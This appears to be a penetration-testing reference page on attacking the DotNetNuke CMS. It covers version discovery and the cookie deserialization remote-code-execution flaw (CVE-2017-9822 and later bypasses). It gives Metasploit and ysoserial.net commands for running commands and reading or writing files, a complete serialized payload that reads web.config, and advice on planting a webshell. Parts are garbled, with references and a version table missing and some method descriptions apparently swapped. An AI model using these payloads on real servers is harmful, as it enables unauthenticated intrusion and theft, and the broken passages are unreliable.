DNN (formerly DotNetNuke) is an open-source Content Management System (CMS), written in C# and based on the .NET framework. A number of core features can be expended through a large panel of third-party (or in-house) apps and modules to extend the CMS basic functionalities.
Identification and discovery
Version disclosure
The /Documentation/License.txt file, if present, may hold information about the release year of the DotNetNuke version being used by the webserver.
DotNetNuke - http://www.dotnetnuke.com
Copyright (c) 2002-2017
by DotNetNuke Corporation
[...]
Robots.txt
By default, DotNetNuke installation configure a verbose robots.txt entry, listing a number of built-in locations.
A deserialization vulnerability is present in the DotNetNuke (DNN) CMS, versions 5.0.0 to 9.3.0-RC, which can be leveraged to remotely execute code on the underlying system without authentication. The vulnerability lies in the deserialization of the DNNPersonalization cookie (XML format), used to store (authenticated or unauthenticated) user's preferences. This cookie is notably processed during handling of 404 errors if the built-in default DNN's missing page is used.
XamlReader.Load(String), leading to remote code execution.
ObjectStateFormatter.Deserialize(String), leading to remote code execution.
DotNetNuke.Common.Utilities.FileSystemUtils.PullFile(String), for arbitrary file write (for example to upload a webshell if a writable path can be found).
DotNetNuke.Common.Utilities.FileSystemUtils.WriteFile(String), for arbitrary file read.
Note that the usable types may be limited to DotNetNuke.* classes (and thus to arbitrary file read / write).
The initial vulnerability is identified by CVE-2017-9822, with a number of bypass of the attempts at fixing the initial bug identified as CVE-2018-15811, CVE-2018-15812, CVE-2018-15825, and CVE-2018-15826.
The following DotNetNuke versions are vulnerable:
Metasploit module (for pre and post CVE-2017-9822 patching exploit)
The Metasploit's exploit/windows/http/dnn_cookie_deserialization_rce module can be used to exploit the deserialization remote code execution vulnerability, prior to the initial patching CVE-2017-9822 and using the subsequent bypass.
msf > use exploit/windows/http/dnn_cookie_deserialization_rce
Pre-patching exploitation (CVE-2017-9822) using ysoserial
ysoserial.net can be used to generate DotNetNuke cookies that will result in the execution of the specified command or arbitrary read / write of the given file against DotNetNuke version 5.0.0 to 9.1.0.
ysoserial.exe -p DotNetNuke -m run_command -c "<COMMAND>"
ysoserial.exe -p DotNetNuke -m read_file -f "<FILE | FILE_FULL_PATH>"
ysoserial.exe -p DotNetNuke -m write_file -u "<FILE_TO_FETCH_URL>" -f "<FILE>"
# Retrieves the "web.config" configuration file (in its default location) in order to identify the webserver hosted directories for the upload o a webshell.
.\ysoserial.exe -p DotNetNuke -m read_file -f C:\DotNetNuke\web.config
<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:\DotNetNuke\web.config</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
The generated serialized cookie can then be sent to a non-existing page using, for example, the curl utility:
While the object type to deserialize is user-controlled in the DNNPersonalization cookie, the XmlSerializer class (used by CNN for the processing) cannot be used to serialize / deserialize types with interface members. As stated in the , the ObjectDataProvider class can be used in combination with one of the following methods:
5.0.0 to 9.1.0 ()
9.1.1 ()
9.2 to 9.2.1 ()
9.2.2 to 9.3.0-RC ( and )
The "" blog post can be consulted for information on how to exploit the vulnerability using metasploit depending on the targeted version.
